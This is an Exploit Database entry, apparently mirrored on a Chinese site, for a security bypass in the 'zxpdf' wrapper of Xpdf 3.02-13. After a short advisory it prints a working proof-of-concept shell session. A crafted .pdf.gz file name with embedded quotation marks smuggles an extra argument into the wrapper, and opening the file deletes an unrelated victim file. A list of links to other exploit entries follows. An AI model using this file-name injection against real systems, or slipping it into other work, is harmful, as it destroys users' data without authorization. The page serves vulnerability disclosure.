Xpdf 3.02-13 – ‘zxpdf’ Security Bypass

Exploit Database
28 阅读

作者： Chung-chieh Shan

日期： 2011-08-04
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/36016/

source: https://www.securityfocus.com/bid/49007/info

Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

$ touch y # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory

last Exploits
Xpdf 3.02-13 – ‘zxpdf’ Security Bypass的更多信息

Auerswald COMpact 8.0B – Multiple Backdoors：
Synactis PDF In-The-Box – ConnectToSynactic Stack Buffer Overflow (Metasploit)：
CyberArk 9.7 – Memory Disclosure：
Sambar Server 6 – Search Results Buffer Overflow (Metasploit)：
Microsoft IIS – ISAPI ‘nsiislog.dll’ ISAPI POST Overflow (MS03-022) (Metasploit)：
Adobe Flash / Reader – Live Malware：
Eclipse Equinoxe OSGi Console – Command Execution (Metasploit)：
Microsoft IIS FTP Server – NLST Response Overflow (MS09-053) (Metasploit)：